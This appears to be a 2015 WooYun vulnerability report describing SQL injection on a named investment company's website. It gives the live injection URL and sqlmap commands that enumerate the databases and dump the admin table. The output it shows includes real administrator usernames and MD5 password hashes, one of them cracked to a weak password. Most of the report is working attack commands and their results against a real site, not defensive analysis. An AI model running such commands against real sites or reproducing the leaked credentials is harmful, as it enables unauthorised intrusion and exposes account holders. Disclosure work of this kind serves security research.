
Vulnerability summary

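Bug ID: wooyun-2015-098461

Title: 剑平国际投资公司 SQL injection vulnerability (weak passwords present)

Vendor: 剑平国际投资公司

Author: 明月影

Submitted: 2015-02-27 11:39

Fixed: 2015-04-13 16:58

Disclosed: 2015-04-13 16:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Unable to contact the vendor, or the vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]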


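Vulnerability details

Disclosure status:

2015-02-27: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-04-13: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection at a location on the main site

Detailed description:

Injection point: http://www.jpi.cn/show.php?id=182&channel=2&class=30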


available databases [3]:
[*] information_schema
[*] test
[*] xr7igl
Database: xr7igl
[44 tables]
+---------------------+
| admin |
| admin_group |
| advert |
| advert_words |
| article |
| article_add |
| channel |
| class |
| class_link |
| corpinfo |
| e_article |
| e_article_add |
| e_zp_article |
| e_zp_article_add |
| frindlink |
| member |
| member_class |
| member_complaints |
| member_consume |
| member_group |
| member_guestbook |
| member_subscription |
| mode |
| mode_custom_search |
| mode_fields |
| mykeys |
| pic_article_add |
| plugs |
| pro |
| pro_add |
| rjxz |
| rjxz_add |
| shop_address |
| shop_car |
| shop_car_order |
| shop_send |
| sortup |
| swm_fields |
| swm_tables |
| topic |
| topic_list |
| travel_apply |
| zp_article |
| zp_article_add |
+---------------------+
sqlmap.py -u "http://www.jpi.cn/show.php?id=182&channel=2&class=30" --dbms mysql -D xr7igl -T admin --columns
Database: xr7igl
Table: admin
[9 columns]
+------------+------------------+
| Column | Type |
+------------+------------------+
| aid | char(20) |
| channels | varchar(30) |
| crew | varchar(255) |
| groupid | smallint(5) |
| id | int(5) |
| logincount | int(10) unsigned |
| logindate | datetime |
| modes | varchar(255) |
| pwd | char(32) |
+------------+------------------+
Database: xr7igl
Table: admin_group
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(5) |
| purviews | text |
| title | varchar(50) |
+----------+-------------+
sqlmap.py -u "http://www.jpi.cn/show.php?id=182&channel=2&class=30" --dbms mysql -D xr7igl -T admin -C id,aid,logincount,pwd --dump
Database: xr7igl
Table: admin
[3 entries]
+----+-------+------------+-------------------------------------------+
| id | aid | logincount | pwd |
+----+-------+------------+-------------------------------------------+
| 1 | admin | 285 | d05056f0f8ee664ca41c2dfa0f6e5954 |
| 3 | root | 23 | e10adc3949ba59abbe56e057f20f883e (123456) |
| 4 | yewu | 13 | 0d0d4c4c20a8c8dd15040953a14ef12a |
+----+-------+------------+-------------------------------------------+
There is no firewall, and the input filtering is unreliable.
There are also weak passwords.

Proof of vulnerability:

+----+-------+------------+-------------------------------------------+
| id | aid | logincount | pwd |
+----+-------+------------+-------------------------------------------+
| 1 | admin | 285 | d05056f0f8ee664ca41c2dfa0f6e5954 |
| 3 | root | 23 | e10adc3949ba59abbe56e057f20f883e (123456) |
| 4 | yewu | 13 | 0d0d4c4c20a8c8dd15040953a14ef12a |
+----+-------+------------+-------------------------------------------+

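Suggested fix:

When it comes to fixing vulnerabilities, you are the professionals.

Copyright notice: when reposting, please credit the source 明月影@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused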